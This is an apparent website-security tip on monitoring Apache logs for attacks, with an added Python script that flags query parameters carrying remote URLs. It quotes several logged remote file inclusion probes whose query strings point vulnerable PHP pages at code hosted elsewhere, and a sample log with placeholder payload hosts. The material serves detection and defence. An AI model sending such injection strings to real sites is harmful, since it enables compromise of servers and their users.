
Be Paranoid About Your Website Traffic

Tip #5

Website hacks happen in one of two ways: from external sources or from internal sources. You've established strong passwords, validated user input, kept your software updated and limited the personal and business data that is viewable. You're paranoid and off to a great start. But now you need to monitor your website traffic.

Whether you run Windows Server or a flavor of Unix with Apache, all servers create several types of traffic logs. These logs can provide lots of information, including SMTP access, password-cracking attempts, and website access and error logs.

Website logs are your friends. Use them. If you don't have access to these logs, contact your hosting company and find out what they have available for your use. If your site gets little traffic, examining the logs manually will be easy.

A typical log will include data about your visitors, including IP address, HTTP queries, browser type and much more. Look for poisoned queries.

A typical line in your log might look like this:

255.255.255.255 - - [17/Sep/2009:13:39:00 -0500] "GET / HTTP/1.1" 200 72285 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"

With the exception of the IP address there is nothing wrong with the above.

But maybe you will come across some cross-site attacks like these:

94.23.197.26 - - [17/Sep/2009:12:00:25 -0500] "GET /index.php?Language=http: // tmsabogados . com . ar/img/back.gif??? HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"

70.85.146.66 - - [17/Sep/2009:07:48:32 -0500] "GET // index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http : // dogstudio . net/ampoll/idxx.txt?? HTTP/1.1" 302 - "-" "Mozilla/5.0"

65.92.200.221 - - [17/Sep/2009:13:34:25 -0500] "GET /subcategory_products.php?category= http : // 217.218.225.2 :2082 /index.html? HTTP/1.1" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"

Each one of the above connections is a hack attempt. Each attack passes the URL of a file stored on another, possibly innocent, website in the query string, attempting to inject that file into your website.

These are real world attacks.

If your website or business has significant traffic then you may need to automate your log research. There are many free and commercial-grade log parsers that will examine and cull data from your log files, alerting you to ongoing or potential problems. Google "log parsers" and find one you trust.
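As an added example (not code from the tip's author), here is a small Python checker that parses Apache combined-format lines and flags any query parameter whose value is a remote URL, which is what the three requests above have in common. The log lines, IP addresses and hostnames in it are constructed placeholders, and the URL pattern it matches is a deliberately narrow assumption.

```python
import re
from urllib.parse import parse_qsl, unquote
# Apache "combined" format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "agent".
# The path group is lazy so spaces inside a malformed request line do not break parsing.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>.*?) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)
# A query parameter whose value is an absolute URL is the signature of the probes in the tip.
REMOTE_URL_RE = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)
# Constructed sample modeled on the tip's lines, with placeholder addresses and hosts.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Sep/2009:13:39:00 -0500] "GET / HTTP/1.1" 200 72285 "-" "Mozilla/4.0 (compatible; MSIE 8.0)"
198.51.100.7 - - [17/Sep/2009:12:00:25 -0500] "GET /index.php?Language=http://payload.example/img/back.gif??? HTTP/1.1" 302 - "-" "Mozilla/5.0"
198.51.100.8 - - [17/Sep/2009:07:48:32 -0500] "GET //index.php?option=com_frontpage&Itemid=&mosConfig_absolute_path=http://payload.example/idxx.txt?? HTTP/1.1" 302 - "-" "Mozilla/5.0"
198.51.100.9 - - [17/Sep/2009:13:34:25 -0500] "GET /subcategory_products.php?category=http%3A%2F%2F203.0.113.2%3A2082%2Findex.html%3F HTTP/1.1" 302 - "-" "Mozilla/4.0"
192.0.2.11 - - [17/Sep/2009:14:01:02 -0500] "GET /search.php?q=http+basics HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

def parse_line(line):
    # Split one combined-format line into its fields; None if it does not parse.
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def suspicious_params(path):
    # (name, value) pairs from the query string whose value is a remote URL.
    query = path.split("?", 1)[1] if "?" in path else ""
    hits = []
    for name, value in parse_qsl(query, keep_blank_values=True):
        # parse_qsl percent-decodes once; decode again to catch double encoding,
        # then drop whitespace so a spaced-out "http : //" is still recognized.
        normalized = unquote(value).replace(" ", "").replace("\t", "")
        if REMOTE_URL_RE.match(normalized):
            hits.append((name, normalized))
    return hits

def scan(log_text):
    # One finding per flagged parameter: who sent it, when, and what it tried to load.
    findings = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue  # unparseable line: not this check's job, but worth a look
        for name, value in suspicious_params(entry["path"]):
            findings.append({"ip": entry["ip"], "time": entry["time"], "param": name, "value": value})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} tried to load {f['value']} via ?{f['param']}=")
```

The last sample line shows why the check keys on a decoded `scheme://` prefix rather than the word "http": an ordinary search for "http basics" is not flagged.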

When researching your logs, look to see what directories are being visited or scanned. Don't leave security-sensitive data hanging around on your website or servers. Password-protect directories. Exercise extreme caution with writeable directories or files. Can these files or directories be accessed and written to from the outside?

A good rule of thumb is to deny all, then allow a select few. Secure content-sensitive directories further by limiting access by user, password and IP address. There are several ways to accomplish this using .htaccess, SQL, MySQL, PHP or ASP.

Use your logs to help you respond better, and more proactively, to internet threats.

Next: Tip #6 Limit Your Exposure